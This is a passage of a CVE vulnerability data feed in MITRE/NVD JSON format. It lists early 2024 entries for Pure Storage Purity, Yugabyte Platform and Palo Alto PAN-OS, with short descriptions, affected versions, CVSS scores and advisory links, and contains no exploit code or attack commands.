{ "CVE_data_type" : "CVE", "CVE_data_format" : "MITRE", "CVE_data_version" : "4.0", "CVE_data_numberOfCVEs" : "38552", "CVE_data_timestamp" : "2025-08-20T07:00Z", "CVE_Items" : [ { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0001", "ASSIGNER" : "psirt@purestorage.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-1188" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://purestorage.com/security", "name" : "https://purestorage.com/security", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A condition exists in FlashArray Purity whereby a local account intended for initial array configuration remains active potentially allowing a malicious actor to gain elevated privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4.0", "versionEndIncluding" : "6.4.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.3.0", "versionEndIncluding" : "6.3.14", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-09-23T18:15Z", "lastModifiedDate" : "2024-09-27T14:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0002", "ASSIGNER" : "psirt@purestorage.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://purestorage.com/security", "name" : "https://purestorage.com/security", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A condition exists in FlashArray Purity whereby an attacker can employ a privileged account allowing remote access to the array." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4.0", "versionEndIncluding" : "6.4.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.3.0", "versionEndIncluding" : "6.3.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:6.5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2.0", "versionEndIncluding" : "6.2.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.1.8", "versionEndIncluding" : "6.1.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.7", "versionEndIncluding" : "6.0.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.3.17", "versionEndIncluding" : "5.3.21", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-09-23T18:15Z", "lastModifiedDate" : "2024-09-27T14:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0003", "ASSIGNER" : "psirt@purestorage.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://purestorage.com/security", "name" : "https://purestorage.com/security", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A condition exists in FlashArray Purity whereby a malicious user could use a remote administrative service to create an account on the array allowing privileged access." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4.0", "versionEndIncluding" : "6.4.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.3.0", "versionEndIncluding" : "6.3.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:6.5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2.0", "versionEndIncluding" : "6.2.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.1.8", "versionEndIncluding" : "6.1.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.7", "versionEndIncluding" : "6.0.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.3.17", "versionEndIncluding" : "5.3.21", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-09-23T18:15Z", "lastModifiedDate" : "2024-09-27T14:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0004", "ASSIGNER" : "psirt@purestorage.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://purestorage.com/security", "name" : "https://purestorage.com/security", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A condition exists in FlashArray Purity whereby an user with array admin role can execute arbitrary commands remotely to escalate privilege on the array." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4.0", "versionEndIncluding" : "6.4.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.3.0", "versionEndIncluding" : "6.3.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:6.5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2.0", "versionEndIncluding" : "6.2.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.2.0", "versionEndIncluding" : "5.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.1.0", "versionEndIncluding" : "5.1.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.0.0", "versionEndIncluding" : "5.0.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.1.0", "versionEndIncluding" : "6.1.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.0", "versionEndIncluding" : "6.0.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.3.0", "versionEndIncluding" : "5.3.21", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-09-23T18:15Z", "lastModifiedDate" : "2024-09-27T14:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0005", "ASSIGNER" : "psirt@purestorage.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://purestorage.com/security", "name" : "https://purestorage.com/security", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A condition exists in FlashArray and FlashBlade Purity whereby a malicious user could execute arbitrary commands remotely through a specifically crafted SNMP configuration." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4.0", "versionEndIncluding" : "6.4.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.3.0", "versionEndIncluding" : "6.3.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:6.5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2.0", "versionEndIncluding" : "6.2.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.2.0", "versionEndIncluding" : "5.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.1.0", "versionEndIncluding" : "5.1.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.0.0", "versionEndIncluding" : "5.0.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.1.0", "versionEndIncluding" : "6.1.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.0", "versionEndIncluding" : "6.0.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.3.0", "versionEndIncluding" : "5.3.21", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fa:6.6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.2.0", "versionEndIncluding" : "4.2.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.1.0", "versionEndIncluding" : "4.1.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.0.0", "versionEndIncluding" : "4.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.3.0", "versionEndIncluding" : "3.3.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.2.0", "versionEndIncluding" : "3.2.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.1.0", "versionEndIncluding" : "3.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0.0", "versionEndIncluding" : "3.0.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:4.3.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:purestorage:purity\\/\\/fb:4.3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-09-23T18:15Z", "lastModifiedDate" : "2024-09-27T15:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0006", "ASSIGNER" : "security@yugabyte.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yugabyte/yugabyte-db/commit/439c6286f1971f9ac6bff2c7215b454c2025c593", "name" : "https://github.com/yugabyte/yugabyte-db/commit/439c6286f1971f9ac6bff2c7215b454c2025c593", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/yugabyte/yugabyte-db/commit/439c6286f1971f9ac6bff2c7215b454c2025c593", "name" : "https://github.com/yugabyte/yugabyte-db/commit/439c6286f1971f9ac6bff2c7215b454c2025c593", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/yugabyte/yugabyte-db/commit/5cc7f4e15d6ccccbf97c57946fd0aa630f88c9e2", "name" : "https://github.com/yugabyte/yugabyte-db/commit/5cc7f4e15d6ccccbf97c57946fd0aa630f88c9e2", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/yugabyte/yugabyte-db/commit/5cc7f4e15d6ccccbf97c57946fd0aa630f88c9e2", "name" : "https://github.com/yugabyte/yugabyte-db/commit/5cc7f4e15d6ccccbf97c57946fd0aa630f88c9e2", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/yugabyte/yugabyte-db/commit/d96e6b629f34d065b47204daeeb44064e484c579", "name" : "https://github.com/yugabyte/yugabyte-db/commit/d96e6b629f34d065b47204daeeb44064e484c579", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/yugabyte/yugabyte-db/commit/d96e6b629f34d065b47204daeeb44064e484c579", "name" : "https://github.com/yugabyte/yugabyte-db/commit/d96e6b629f34d065b47204daeeb44064e484c579", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Information exposure in the logging system in Yugabyte Platform allows local attackers with access to application logs to obtain database user credentials in log files, potentially leading to unauthorized database access." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-07-19T15:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0007", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.paloaltonetworks.com/CVE-2024-0007", "name" : "https://security.paloaltonetworks.com/CVE-2024-0007", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0007", "name" : "https://security.paloaltonetworks.com/CVE-2024-0007", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface on Panorama appliances. This enables the impersonation of another authenticated administrator." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.1.0", "versionEndExcluding" : "8.1.24", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.0.0", "versionEndExcluding" : "9.0.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.1.0", "versionEndExcluding" : "9.1.16", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.0.0", "versionEndExcluding" : "10.0.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.1.0", "versionEndExcluding" : "10.1.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:8.1.24:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:paloaltonetworks:panorama_m-200:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:paloaltonetworks:panorama_m-500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:paloaltonetworks:panorama_m-600:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-14T18:15Z", "lastModifiedDate" : "2024-12-17T18:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0008", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-613" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.paloaltonetworks.com/CVE-2024-0008", "name" : "https://security.paloaltonetworks.com/CVE-2024-0008", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0008", "name" : "https://security.paloaltonetworks.com/CVE-2024-0008", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Web sessions in the management interface in Palo Alto Networks PAN-OS software do not expire in certain situations, making it susceptible to unauthorized access." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.2.0", "versionEndExcluding" : "10.2.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.0.0", "versionEndExcluding" : "11.0.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.1.0", "versionEndExcluding" : "10.1.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:10.1.10:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.0.0", "versionEndExcluding" : "10.0.12", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:10.0.12:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.1.0", "versionEndExcluding" : "9.1.17", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.0.0", "versionEndExcluding" : "9.0.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:h1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-14T18:15Z", "lastModifiedDate" : "2024-12-09T15:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0009", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-346" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.paloaltonetworks.com/CVE-2024-0009", "name" : "https://security.paloaltonetworks.com/CVE-2024-0009", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0009", "name" : "https://security.paloaltonetworks.com/CVE-2024-0009", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An improper verification vulnerability in the GlobalProtect gateway feature of Palo Alto Networks PAN-OS software enables a malicious user with stolen credentials to establish a VPN connection from an unauthorized IP address." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.0:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.0:h1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.0:h2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.0:h3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.0:h4:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.2.0", "versionEndExcluding" : "10.2.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.4 } }, "publishedDate" : "2024-02-14T18:15Z", "lastModifiedDate" : "2024-12-09T15:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0010", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : 